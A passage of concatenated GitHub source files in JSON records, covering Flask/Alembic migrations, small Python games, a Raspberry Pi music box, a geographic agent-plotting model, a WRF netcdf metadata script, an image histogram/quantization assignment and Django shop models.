sa.Column('last_name', sa.String(length=120), nullable=False),\n sa.Column('email', sa.String(length=120), nullable=False),\n sa.Column('password', sa.String(length=80), nullable=False),\n sa.Column('is_active', sa.Boolean(), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email')\n )\n op.create_table('favorites_characters',\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('character_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['character_id'], ['personajes.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['usuarios.id'], )\n )\n op.create_table('favorites_planets',\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('planet_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['planet_id'], ['planetas.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['usuarios.id'], )\n )\n op.drop_index('email', table_name='user')\n op.drop_table('user')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user',\n sa.Column('id', mysql.INTEGER(), autoincrement=True, nullable=False),\n sa.Column('email', mysql.VARCHAR(length=120), nullable=False),\n sa.Column('password', mysql.VARCHAR(length=80), nullable=False),\n sa.Column('is_active', mysql.TINYINT(display_width=1), autoincrement=False, nullable=False),\n sa.CheckConstraint('(`is_active` in (0,1))', name='user_chk_1'),\n sa.PrimaryKeyConstraint('id'),\n mysql_collate='utf8mb4_0900_ai_ci',\n mysql_default_charset='utf8mb4',\n mysql_engine='InnoDB'\n )\n op.create_index('email', 'user', ['email'], unique=True)\n op.drop_table('favorites_planets')\n op.drop_table('favorites_characters')\n op.drop_table('usuarios')\n op.drop_table('planetas')\n op.drop_table('personajes')\n # ### end Alembic commands ###\n","repo_name":"mzunigau/StarWarsAPI-Flask","sub_path":"migrations/versions/3a24472d1754_.py","file_name":"3a24472d1754_.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"15457991132","text":"from random import randint\n\n\nuser_board = [[' '] * 8 for x in range(8)]\n\ncomputer_board = [[' '] * 8 for x in range(8)]\n\nletters_to_numbers = {\n 'A': 0,\n 'B': 1,\n 'C': 2,\n 'D': 3,\n 'E': 4,\n 'F': 5,\n 'G': 6,\n 'H': 7,\n}\n\ndef print_board(board):\n print('A B C D E F G H')\n print('----------------')\n row_number = 1\n for row in board:\n print(\"%d|%s|\" % (row_number, \"|\".join(row)))\n row_number += 1\n\ndef place_ships(board):\n for ship in range(8):\n ship_row, ship_column = randint(0, 7), randint(0, 7)\n while board[ship_row][ship_column] == 'x':\n ship_row, ship_column = randint(0, 7), randint(0, 7)\n board[ship_row][ship_column] = 'X'\n\ndef play_game():\n pass\n\ndef valid_coordinates():\n row = input(\"Enter the row of the ship: \").upper()\n while row not in \"12345678\":\n print(\"Please select a valid number between 1 and 8 inclusive\")\n row = input(\"Enter the row of the ship: \").upper()\n column = input(\"Enter the column of the ship: \").upper()\n while column not in \"ABCDEFGH\":\n print(\"Please choose a valud option between A and H inclusive\")\n column = input(\"Enter the column of the ship: \").upper()\n return int(row) - 1, letters_to_numbers[column]\n \ndef ships_sunk(board):\n count = 0\n for row in board:\n for column in row:\n if column == \"X\":\n count += 1\n return count\n\ndef new_game():\n pass\n\n\n","repo_name":"Johncci/battleship-down","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"28300473465","text":"import pygame\nfrom gpiozero import Button, LEDBoard\nfrom signal import pause\n\npygame.init()\n\nbutton_1 = Button(14)\nbutton_2 = Button(18)\nbutton_3 = Button(9)\nbutton_4 = Button(10)\n\nled = LEDBoard(11,22,27,17)\n\n\nsound1 = pygame.mixer.Sound('samples/drum_tom_mid_hard.wav')\nsound2 = pygame.mixer.Sound('samples/drum_splash_hard.wav')\nsound3 = pygame.mixer.Sound('samples/drum_cowbell.wav')\nsound4 = pygame.mixer.Sound('samples/drum_cymbal_closed.wav')\n\n\nbutton_1.when_pressed = sound1.play\nbutton_2.when_pressed = sound2.play\nbutton_3.when_pressed = sound3.play\nbutton_4.when_pressed = sound4.play\n\ndef button_1_on() :\n led.value = (1,0,0,0)\n \ndef button_2_on() :\n led.value = (0,1,0,0)\n \ndef button_3_on() :\n led.value = (0,0,1,0)\n \ndef button_4_on() :\n led.value = (0,0,0,1)\n \n\nwhile True:\n if button_1.is_pressed:\n button_1_on()\n \n if button_2.is_pressed:\n button_2_on() \n \n if button_3.is_pressed:\n button_3_on()\n\n if button_4.is_pressed:\n button_4_on()\n","repo_name":"n3rdz/gpio-musicbox","sub_path":"musicbox.py","file_name":"musicbox.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"18774615949","text":"import matplotlib.pyplot as plt\nimport json\nimport math\n\nimport matplotlib as mil\nmil.use('TkAgg')\n\n\nclass Agent:\n\n def __init__(self, position, **agent_attributes):\n self.position = position\n for attr_name, attr_value in agent_attributes.items():\n setattr(self, attr_name, attr_value)\n\n\nclass Position:\n def __init__(self, longitude_degrees, latitude_degrees):\n # We store the degree values, but we will be mostly using radians\n # because they are much more convenient for computation purposes.\n\n # assert : Lève une exception si renvoie False\n assert -180 <= longitude_degrees <= 180\n self.longitude_degrees = longitude_degrees\n\n assert -90 <= latitude_degrees <= 90\n self.latitude_degrees = latitude_degrees\n\n @property\n def longitude(self):\n # Longitude in radians\n return self.longitude_degrees * math.pi / 180\n\n @property\n def latitude(self):\n # Latitude in radians\n return self.latitude_degrees * math.pi / 180\n\n\nclass Zone:\n \"\"\"\n A rectangular geographic area bounded by two corners. The corners can\n be top-left and bottom right, or top-right and bottom-left so you should be\n careful when computing the distances between them.\n \"\"\"\n ZONES = []\n\n # Attributs de classe (constante si hors de la classe) car on fait cls.WIDTH_DEGREES\n MIN_LONGITUDE_DEGREES = -180\n MAX_LONGITUDE_DEGREES = 180\n MIN_LATITUDE_DEGREES = -90\n MAX_LATITUDE_DEGREES = 90\n WIDTH_DEGREES = 1 # degrees of longitude\n HEIGHT_DEGREES = 1 # degrees of\n EARTH_RADIUS_KILOMETERS = 6371\n\n # S'il y a un attribut d'instance, il va dans __init__\n def __init__(self, corner1, corner2):\n self.corner1 = corner1\n self.corner2 = corner2\n self.inhabitants = []\n\n @property\n def population(self):\n return len(self.inhabitants)\n\n @property\n def width(self):\n # Note that here we access the class attribute via \"self\" and it\n # doesn't make any difference\n return abs(self.corner1.longitude - self.corner2.longitude) * self.EARTH_RADIUS_KILOMETERS\n\n @property\n def height(self):\n return abs(self.corner1.latitude - self.corner2.latitude) * self.EARTH_RADIUS_KILOMETERS\n\n @property\n def area(self):\n return self.height * self.width\n\n def population_density(self):\n return self.population / self.area\n\n def average_agreeableness(self):\n if not self.inhabitants:\n return 0\n # agreeableness = []\n # for inhabitant in self.inhabitants:\n # agreeableness.append(inhabitant.agreableness)\n # return sum(agreeableness) / self.population\n return sum([inhabitant.agreeableness for inhabitant in self.inhabitants]) / self.population\n\n def add_inhabitant(self, inhabitant):\n self.inhabitants.append(inhabitant)\n\n def contains(self, position):\n \"\"\"Return True if the zone contains this position\"\"\"\n return position.longitude >= min(self.corner1.longitude, self.corner2.longitude) and \\\n position.longitude < max(self.corner1.longitude, self.corner2.longitude) and \\\n position.latitude >= min(self.corner1.latitude, self.corner2.latitude) and \\\n position.latitude < max(\n self.corner1.latitude, self.corner2.latitude)\n\n @classmethod\n def find_zone_that_contains(cls, position):\n if not cls.ZONES:\n # Initialize zones automatically if necessary\n cls._initialize_zones()\n\n # Compute the index in the ZONES array that contains the given position\n longitude_index = int(\n (position.longitude_degrees - cls.MIN_LONGITUDE_DEGREES) / cls.WIDTH_DEGREES)\n latitude_index = int(\n (position.latitude_degrees - cls.MIN_LATITUDE_DEGREES) / 
cls.HEIGHT_DEGREES)\n longitude_bins = int((cls.MAX_LONGITUDE_DEGREES -\n cls.MIN_LONGITUDE_DEGREES) / cls.WIDTH_DEGREES) # 180-(-180) / 1\n zone_index = latitude_index * longitude_bins + longitude_index\n\n # Just checking that the index is correct\n zone = cls.ZONES[zone_index]\n assert zone.contains(position)\n\n return zone\n\n @classmethod\n def _initialize_zones(cls):\n for latitude in range(cls.MIN_LATITUDE_DEGREES, cls.MAX_LATITUDE_DEGREES, cls.HEIGHT_DEGREES):\n for longitude in range(cls.MIN_LONGITUDE_DEGREES, cls.MAX_LONGITUDE_DEGREES, cls.WIDTH_DEGREES):\n bottom_left_corner = Position(longitude, latitude)\n top_right_corner = Position(\n longitude + cls.WIDTH_DEGREES, latitude + cls.HEIGHT_DEGREES)\n zone = Zone(bottom_left_corner, top_right_corner)\n cls.ZONES.append(zone)\n\n\nclass BaseGraph:\n\n def __init__(self):\n self.title = \"Your graph title\"\n self.x_label = \"X-axis label\"\n self.y_label = \"X-axis label\"\n self.show_grid = True\n\n def show(self, zones):\n # x_values = gather only x_values from our zones\n # y_values = gather only y_values from our zones\n x_values, y_values = self.xy_values(zones)\n plt.plot(x_values, y_values, '.')\n plt.xlabel(self.x_label)\n plt.ylabel(self.y_label)\n plt.title(self.title)\n plt.grid(self.show_grid)\n plt.show()\n\n def xy_values(self, zones):\n raise NotImplementedError\n\n\nclass AgreeablenessGraph(BaseGraph):\n\n def __init__(self):\n # Call base constructor\n super(AgreeablenessGraph, self).__init__()\n # super().__init__()\n self.title = \"Nice people live in the countryside\"\n self.x_label = \"population density\"\n self.y_label = \"agreeableness\"\n\n def xy_values(self, zones):\n x_values = [zone.population_density() for zone in zones]\n y_values = [zone.average_agreeableness() for zone in zones]\n return x_values, y_values\n\n\ndef main():\n # Zone.initialize_zones()\n for agent_attributes in json.load(open(\"agents-100k.json\")):\n latitude = agent_attributes.pop(\"latitude\")\n longitude = agent_attributes.pop(\"longitude\")\n position = Position(longitude, latitude)\n agent = Agent(position, **agent_attributes)\n # print(agent.agreeableness)\n zone = Zone.find_zone_that_contains(position)\n zone.add_inhabitant(agent)\n # print(\"Zone population: \", zone.population)\n # print(zone.average_agreeableness())\n\n agreeableness_graph = AgreeablenessGraph()\n agreeableness_graph.show(Zone.ZONES)\n\n\nmain()\n\n# agent = Agent(agent_attributes)\n# print(agent.agreeableness)\n# print(agent.neuroticism)\n","repo_name":"jlum85/POO-Python","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"45923155735","text":"# get forecast_time attrs from dset to use in interpolation\ndef open_ds( fn, variable ):\n ''' cleanly read variable/close a single hourly netcdf '''\n import xarray as xr\n ds = xr.open_dataset( fn, autoclose=True )\n out = ds[ variable ].copy()\n ds.close()\n return out\ndef list_files( dirname ):\n '''\n list the files and split the filenames into their descriptor parts and \n return dataframe of elements and filename sorted by:['year', 'month', 'day', 'hour']\n '''\n import os\n import pandas as pd\n\n files = [ get_month_day( os.path.join(r, fn)) for r,s,files in os.walk( dirname ) \n for fn in files if os.path.split(r)[-1].isdigit() and fn.endswith( '.nc' )\n and '-*.nc' not in fn and 'old' not in r and 'test' not in r ]\n\n files_df = pd.DataFrame( files )\n return files_df.sort_values( ['year', 'month', 'day', 'hour'] ).reset_index()\ndef get_month_day( fn ):\n dirname, basename = os.path.split( fn )\n year, month, day_hour = basename.split('.')[-2].split('-')\n day, hour = day_hour.split( '_' )\n folder_year = dirname.split('/')[-1]\n return {'fn':fn, 'year':year, 'folder_year':folder_year,'month':month, 'day':day, 'hour':hour}\ndef get_forecast_time( fn ):\n return open_ds( fn, variable='PCPT' ).attrs['forecast_time']\ndef get_file_attrs( fn ):\n try:\n fn_args = get_month_day( fn )\n fn_args.update( forecast_time=get_forecast_time( fn ) )\n except:\n # if there is an issue... dont fail, do this...\n nodata = -9999\n fn_args = {'fn':fn, 'year':nodata, 'folder_year':nodata,'month':nodata, 'day':nodata, 'hour':nodata, 'forecast_time':nodata}\n return fn_args\n\nif __name__ == '__main__':\n import xarray as xr\n import pandas as pd\n import multiprocessing as mp\n import os\n \n # setup args\n # base_path = '/storage01/pbieniek/ccsm/hist/hourly'\n base_path = '/storage01/pbieniek/ccsm/rcp85/hourly'\n # base_path = '/storage01/pbieniek/erain/hourly'\n # base_path = '/storage01/rtladerjr/hourly'\n \n # fn_list = [ os.path.join( r, fn ) for r,s,files in os.walk( base_path ) \n # if 'oldstuff' not in r for fn in files if fn.endswith( '.nc' ) \n # and 'test' not in fn and '-*.nc' not in fn ]\n \n fn_list = list_files( base_path )\n # drop unneeded duplicates\n fn_list = fn_list[ fn_list.folder_year == fn_list.year ]\n print( 'number of files: {}'.format(len( fn_list )) )\n\n ncpus = 32\n output_path = '/workspace/Shared/Tech_Projects/wrf_data/project_data/wrf/docs'\n group = 'ccsm_rcp85'\n # group = 'erain'\n # group = 'gfdl_rcp85'\n\n pool = mp.Pool( ncpus )\n print( 'start multiprocessing' )\n out = [ pool.map( get_file_attrs, fnl['fn'] ) for group, fnl in fn_list.groupby( 'year' ) ]\n out = [ j for i in out for j in i ]\n print( 'multiprocessing complete' )\n pool.close()\n pool.join()\n\n print( 'df' )\n df = pd.DataFrame( out )\n output_filename = os.path.join( output_path, 'WRFDS_forecast_time_attr_{}.csv'.format( group ) )\n print( 'writing to disk' )\n df.to_csv( output_filename, sep=',' )\n","repo_name":"ua-snap/wrf_utils","sub_path":"archive/snap_wrf_data_prep/pipeline/get_date_forecast_time_from_raw_hourly.py","file_name":"get_date_forecast_time_from_raw_hourly.py","file_ext":"py","file_size_in_byte":3159,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"27583150160","text":"def get_and_strip_number(s):\n # replace this comment and the next statement with your function body\n return 0, ''\n\ndef get_and_strip_word(s):\n # replace this comment and the next statement with your function body\n return '', ''\n \ndef pad_words(s, num_words, final_len):\n if num_words <= 1: # best we can do is fill out the line with spaces\n return s + ((final_len - len(s))*' ')\n\n # there are at least 2 words, so at least one pigeon hole to fill (with spaces)\n num_pigeon_holes = num_words - 1 # the buckets (pigeon holes) are between words\n num_pigeons = final_len - (len(s) - num_pigeon_holes) # my pigeons are spaces\n pad_num = num_pigeons // num_pigeon_holes\n extra_num = num_pigeons % num_pigeon_holes # number of holes that get an extra pigeon\n working_str = ''\n \n # take care of the first num_pigeon_holes - extra_num holes\n for i in range(num_pigeon_holes - extra_num):\n word, s = get_and_strip_word(s)\n working_str += word + (pad_num * ' ') # insert pad_num spaces\n\n # take care of the last extra_num holes\n for i in range(extra_num):\n word, s = get_and_strip_word(s)\n working_str += word + ((pad_num + 1) * ' ')\n\n working_str += s\n return working_str\n\nsentence = \"This is a test.\"\nfilled_sentence = pad_words(sentence, 4, 20)\nprint(filled_sentence)\n\nfilled_sentence = pad_words(\"What?\", 1, 30)\nprint(filled_sentence)\n\nprint(pad_words(\"What's up?\", 2, 30))\n\n\n\n\n","repo_name":"Trent-Farley/All-Code","sub_path":"Python1/lab_4_files/python_tutor_exercise.py","file_name":"python_tutor_exercise.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"14803697131","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom skimage.color import rgb2gray\r\nimport skimage.color\r\nfrom imageio import imread\r\n\r\n# the matrix to transfer from rgb to yiq and vice versa\r\nCONSTANT_MATRIX = np.array([[0.299, 0.587, 0.114],\r\n [0.596, -0.275, -0.321],\r\n [0.212, -0.523, 0.311]])\r\n\r\n\r\ndef read_image(filename, representation):\r\n \"\"\"\r\n Gets a filename and an int representing which color image we want(greyscale or rgb)\r\n :param filename: A string\r\n :param representation: An int. 1 for greyscale and 2 for rgb\r\n :return: A matrix representing the image\r\n \"\"\"\r\n im = imread(filename)\r\n im_float = im.astype(np.float64)\r\n im_float /= 255\r\n if representation == 1 and len(im.T) == 3:\r\n return rgb2gray(im_float)\r\n\r\n else:\r\n return im_float\r\n\r\n\r\ndef imdisplay(filename, representation):\r\n \"\"\"\r\n Gets an image and shows it on the screen\r\n :param filename: A string ( name of the image)\r\n :param representation: An int. 1 for greyscale and 2 for rgb\r\n :return: None\r\n \"\"\"\r\n image = read_image(filename, representation)\r\n plt.imshow(image, cmap=plt.cm.gray)\r\n plt.axis('off')\r\n plt.show()\r\n\r\n\r\ndef rgb2yiq(imRGB):\r\n \"\"\"\r\n changing the color from rgb to yiq using\r\n the constant matrix I was given\r\n :param imRGB: A matrix that is shaped (x*y*3)\r\n :return: a yiq matrix\r\n \"\"\"\r\n return np.dot(imRGB, CONSTANT_MATRIX.T)\r\n\r\n\r\ndef yiq2rgb(imYIQ):\r\n \"\"\"\r\n changing the color from yiq to rgb using\r\n the constant matrix I was given\r\n :param imYIQ: A matrix that is shaped (x*y*3)\r\n :return: a rgb matrix\r\n \"\"\"\r\n\r\n return np.dot(imYIQ, (np.linalg.inv(CONSTANT_MATRIX)).T)\r\n\r\n\r\ndef histogram_image(image):\r\n \"\"\"\r\n This is the helper function for histogram equalizer that differentiates\r\n greyscale image from rgb\r\n :param image: A matrix representing the image\r\n :return: if the image is rgb then returns the histogram for y and True\r\n else returns the histogram for the picture and False\r\n \"\"\"\r\n is_rgb = False\r\n if len(image.T) == 3: # check to see if the image is rgb\r\n image = rgb2yiq(image)\r\n is_rgb = True\r\n\r\n original_hist = None\r\n if is_rgb:\r\n y = image[:, :, 0]\r\n y *= 255\r\n y = np.round(y)\r\n original_hist, axis = np.histogram(y, 256, (0, 255))\r\n\r\n if not is_rgb:\r\n image = (image*255).round().astype(np.uint8)\r\n original = image\r\n original_hist, axis = np.histogram(original, 256, (0, 255))\r\n\r\n return original_hist, is_rgb\r\n\r\n\r\ndef histogram_equalize(im_orig):\r\n \"\"\"\r\n Gets a Matrix of an image and equalizes the histogram\r\n :param im_orig: A matrix representing the image\r\n :return: The new equalized image, the original histogram, the new histogram\r\n \"\"\"\r\n original = im_orig.copy()\r\n original_hist, is_rgb = histogram_image(original)\r\n # if is_rgb:\r\n original = (original*255).round().astype(np.uint8)\r\n cumulative_hist = np.cumsum(original_hist)\r\n # find m (first grey scale that is non zero)\r\n non_zeroes = np.nonzero(cumulative_hist)\r\n m = non_zeroes[0][0]\r\n\r\n T = 255 * ((cumulative_hist - cumulative_hist[m]) / (cumulative_hist[-1] - cumulative_hist[m]))\r\n T = np.round(T)\r\n image = T[original.astype(np.uint8)]\r\n new_hist, bins = np.histogram(image, 256, (0, 255))\r\n image_float = image.astype(np.float64)\r\n image_float /= 255\r\n if is_rgb:\r\n original = rgb2yiq(im_orig)\r\n original[:, :, 0] = image_float[:, :, 0]\r\n return 
yiq2rgb(original), original_hist, new_hist\r\n\r\n else:\r\n return image_float, original_hist, new_hist\r\n\r\n\r\ndef quantize(im_orig, n_qaunt, n_iter):\r\n \"\"\"\r\n This function quantize a given image\r\n :param im_orig: The image in a matrix form\r\n :param n_qaunt: The number of colors we are given\r\n :param n_iter: The number of iterations we want\r\n :return: A tuple. The new image in a matrix form and the error rate of\r\n each iteration in an array.\r\n \"\"\"\r\n original = im_orig.copy()\r\n original_histogram, is_rgb = histogram_image(original)\r\n if is_rgb:\r\n original = np.floor(original * 255)\r\n error_list = []\r\n q_list = [0] * n_qaunt\r\n cumulative_hist = np.cumsum(original_histogram)\r\n\r\n z_list = [0] + [np.where(cumulative_hist >= i * (cumulative_hist[-1] / n_qaunt))[0][0]\r\n for i in range(1, n_qaunt)] + [255]\r\n\r\n for j in range(n_qaunt):\r\n lower_val = z_list[j] + 1\r\n upper_val = z_list[j + 1]\r\n g_val = np.arange(lower_val, upper_val + 1)\r\n q_list[j] = np.sum(g_val * original_histogram[lower_val: upper_val + 1]) / \\\r\n np.sum(original_histogram[lower_val: upper_val + 1])\r\n\r\n for i in range(n_iter):\r\n\r\n # compute the new z values\r\n temp_z = [0] + [(q_list[i-1] + q_list[i])/2 for i in range(1, n_qaunt)] + [255]\r\n\r\n # check z values\r\n if temp_z == z_list:\r\n break\r\n elif temp_z != z_list:\r\n z_list = temp_z\r\n # compute the new q values\r\n\r\n for j in range(n_qaunt):\r\n lower_val = int(z_list[j]) + 1\r\n upper_val = int(z_list[j + 1])\r\n g_val = np.arange(lower_val, upper_val + 1)\r\n q_list[j] = np.sum(g_val * original_histogram[lower_val: upper_val + 1]) /\\\r\n np.sum(original_histogram[lower_val: upper_val + 1])\r\n\r\n # compute the error value of this iteration\r\n error_rate = 0\r\n for k in range(n_qaunt):\r\n current_q = q_list[k]\r\n lower_val = int(z_list[k]) + 1\r\n upper_val = int(z_list[k + 1])\r\n g_values = np.arange(lower_val, upper_val+1)\r\n error_rate += np.sum(np.power(current_q-g_values, 2)*original_histogram[lower_val: upper_val + 1])\r\n\r\n error_list.append(error_rate)\r\n\r\n new_hist = np.array([0] * 256)\r\n\r\n for m in range(n_qaunt):\r\n lower_val = int(z_list[m])\r\n upper_val = int(z_list[m+1])\r\n new_hist[lower_val: upper_val+1] = np.floor(q_list[m])\r\n\r\n image = new_hist[original.astype(np.uint64)]\r\n\r\n image_float = image.astype(np.float64)\r\n image_float /= 255\r\n if is_rgb:\r\n im_orig = rgb2yiq(im_orig)\r\n im_orig[:, :, 0] = image_float[:, :, 0]\r\n return yiq2rgb(im_orig), error_list\r\n else:\r\n return image_float, error_list\r\n\r\n\r\nimages = []\r\njer_bw = read_image(r\"externals/jerusalem.jpg\", 1)\r\nimages.append((jer_bw, \"jerusalem grayscale\"))\r\njer_rgb = read_image(r\"externals/jerusalem.jpg\", 2)\r\nimages.append((jer_rgb, \"jerusalem RGB\"))\r\nlow_bw = read_image(r\"externals/low_contrast.jpg\", 1)\r\nimages.append((low_bw, \"low_contrast grayscale\"))\r\nlow_rgb = read_image(r\"externals/low_contrast.jpg\", 2)\r\nimages.append((low_rgb, \"low_contrast RGB\"))\r\nmonkey_bw = read_image(r\"externals/monkey.jpg\", 1)\r\nimages.append((monkey_bw, \"monkey grayscale\"))\r\nmonkey_rgb = read_image(r\"externals/monkey.jpg\", 2)\r\nimages.append((monkey_rgb, \"monkey RGB\"))\r\n\r\n\r\ndef test_rgb2yiq_and_yiq2rgb(im, name):\r\n \"\"\"\r\n Tests the rgb2yiq and yiq2rgb functions by comparing them to the built in ones in the skimage library.\r\n Allows error to magnitude of 1.e-3 (Difference from built in functions can't be bigger than 0.001).\r\n :param im: 
The image to test on.\r\n :param name: Name of image.\r\n :return: 1 on success, 0 on failure.\r\n \"\"\"\r\n imp = rgb2yiq(im)\r\n off = skimage.color.rgb2yiq(im)\r\n\r\n if not np.allclose(imp, off, atol=1.e-3):\r\n print(\"ERROR: in rgb2yiq on image '%s'\" % name)\r\n return 0\r\n imp2 = yiq2rgb(imp)\r\n off2 = skimage.color.yiq2rgb(off)\r\n if not np.allclose(imp2, off2, atol=1.e-3):\r\n print(\"ERROR: in yiq2rgb on image '%s'\" % name)\r\n return 0\r\n print(\"passed conversion test on '%s'\" % name)\r\n return 1\r\n\r\n\r\nfor im in images:\r\n if len(im[0].shape) == 3:\r\n result = test_rgb2yiq_and_yiq2rgb(im[0], im[1])\r\n if not result:\r\n print(\"=== Failed Conversion Test ===\")\r\n break\r\n\r\n\r\ndef display_all(im, add_bonus):\r\n if len(im.shape) == 3 and add_bonus:\r\n fig, a = plt.subplots(nrows=3, ncols=2)\r\n else:\r\n fig, a = plt.subplots(nrows=2, ncols=2)\r\n\r\n # adds the regular image\r\n a[0][0].imshow(im, cmap=plt.cm.gray)\r\n a[0][0].set_title(r\"original image\")\r\n\r\n # adds the quantified image\r\n quant = quantize(im, 3, 10)[0]\r\n a[0][1].imshow(quant, cmap=plt.cm.gray)\r\n a[0][1].set_title(r\"quantize to 3 levels, 10 iterations\")\r\n\r\n # adds the histogram equalized image\r\n hist = histogram_equalize(im)[0]\r\n a[1][0].imshow(hist, cmap=plt.cm.gray)\r\n a[1][0].set_title(\"histogram equalization\")\r\n\r\n # adds quantization on histogram equalized image\r\n hist_quant = quantize(hist, 6, 10)[0]\r\n a[1][1].imshow(hist_quant, cmap=plt.cm.gray)\r\n a[1][1].set_title(\"quantize on equalization\")\r\n\r\n # adds the bonus image\r\n # if len(im.shape) == 3 and add_bonus:\r\n # a[2][0].imshow(quantize_rgb(im, 3))\r\n # a[2][0].set_title(r\"bonus quantize_rgb\")\r\n\r\n plt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n for im in images:\r\n # change \"False\" to \"True\" if you wish to add the bonus task to the print\r\n display_all(im[0], False)\r\n # im = read_image(\"monkey.jpg\", 2)\r\n # yiq = rgb2yiq(im)\r\n # img = yiq2rgb(yiq)\r\n # x = np.hstack([np.repeat(np.arange(0, 50, 2), 10)[None, :], np.array([255] * 6)[None, :]])\r\n # x_normalize = x.astype(np.float64)\r\n # x_normalize /= 255\r\n # grad = np.tile(x_normalize, (256, 1))\r\n # result = histogram_equalize(grad)\r\n #\r\n # plt.imshow(result[0], cmap=plt.cm.gray)\r\n # plt.show()\r\n # after_quant = quantize(result[0], 5, 5)\r\n # # plt.show()\r\n # plt.imshow(after_quant[0], cmap=plt.cm.gray)\r\n # plt.show()\r\n # print(after_quant[1])\r\n # hist = histogram_image(after_quant[0])\r\n # print(hist[0])\r\n\r\n # imdisplay(\"monkey.jpg\", 2)\r\n # imdisplay(\"monkey.jpg\", 1)\r\n","repo_name":"yairabraham5/Image-processing","sub_path":"ex1-yairabraham5/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":10067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"23189543404","text":"\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('modulector', '0020_auto_20210130_0317'),\n ]\n\n operations = [\n migrations.RunSQL(\"delete from MODULECTOR_URLTEMPLATE where name in ('quickgo', 'microrna', 'targetscan')\"),\n migrations.RunSQL(\"update MODULECTOR_URLTEMPLATE set name = 'mirbase' where name ='mirdb'\")\n\n ]\n","repo_name":"omics-datascience/modulector","sub_path":"modulector/migrations/0021_delete_url_templates.py","file_name":"0021_delete_url_templates.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"}
+{"seq_id":"70398509804","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.core.validators import MaxValueValidator, MinValueValidator\nimport uuid\n\n\nclass UserProfile(models.Model):\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False\n )\n user = models.ForeignKey(User,on_delete=models.CASCADE)#username,email etc.\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n image = models.ImageField(upload_to='images/',blank=True,null=True)\n description = models.TextField(blank=True,null=True)\n birthday = models.DateField()\n\n def __str__(self):\n return str(self.user.username)\n\n\nclass Category(models.Model):\n \"\"\" Product has a category \"\"\"\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False\n )\n name = models.CharField(max_length=200)\n def __str__(self):\n return str(self.name)\n \n\nclass Tag(models.Model):\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False\n )\n \"\"\" Product has tag. For a better search operation \"\"\"\n name = models.CharField(max_length=200)\n def __str__(self):\n return str(self.name)\n\nclass Product(models.Model):\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False\n )\n name = models.CharField(max_length=150)\n description = models.CharField(max_length=1500)\n price = models.PositiveIntegerField()\n category = models.ManyToManyField(Category,related_name=\"product_categories\")\n tags = models.ManyToManyField(Tag,related_name=\"product_tags\")\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n sold = models.BooleanField(default=False)\n #thumbnail = models.ImageField(upload_to=\"images/\",blank=True,null=True)\n\n def __str__(self):\n return str(self.name)\n \n def get_thumbnail(self,instance):\n images = instance.objects.filter(product=self)\n for image in images:\n if image.is_thumbnail:\n return image.image\n\n \n\n\n\nclass Comment(models.Model):\n \"\"\" Product has comment. 
To give an idea to users \"\"\"\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False\n )\n user = models.OneToOneField(User,on_delete=models.CASCADE)\n product = models.OneToOneField(Product,on_delete=models.CASCADE)\n comment = models.CharField(max_length=500)\n\n def __str__(self):\n return str(self.comment)[:20]\n \n\n \n\nclass Point(models.Model):\n \"\"\" Product has point that given by users \"\"\"\n user = models.OneToOneField(User,on_delete=models.PROTECT)\n product = models.OneToOneField(Product,on_delete=models.CASCADE)\n value = models.PositiveSmallIntegerField(default=5, validators=[\n MaxValueValidator(5),\n MinValueValidator(1)\n ])\n\n def __str__(self):\n return f\"{self.user.username} : {self.product.name} -> {self.value}\"\n\nclass ProductImage(models.Model):\n \"\"\" Products can have multiple images \"\"\"\n product = models.ForeignKey(Product,on_delete=models.CASCADE)\n image = models.ImageField(upload_to = \"images/\")\n is_thumbnail = models.BooleanField(default=False)\n\n def __str__(self):\n return f\" image for {self.product.name}\"\n\nclass Basket(models.Model):\n user = models.ForeignKey(User,on_delete=models.CASCADE)\n products = models.ManyToManyField(Product,related_name=\"products_in_basket\")\n\n def __str__(self):\n return f\"{self.user}\"\n","repo_name":"yunusarli/Flopit","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
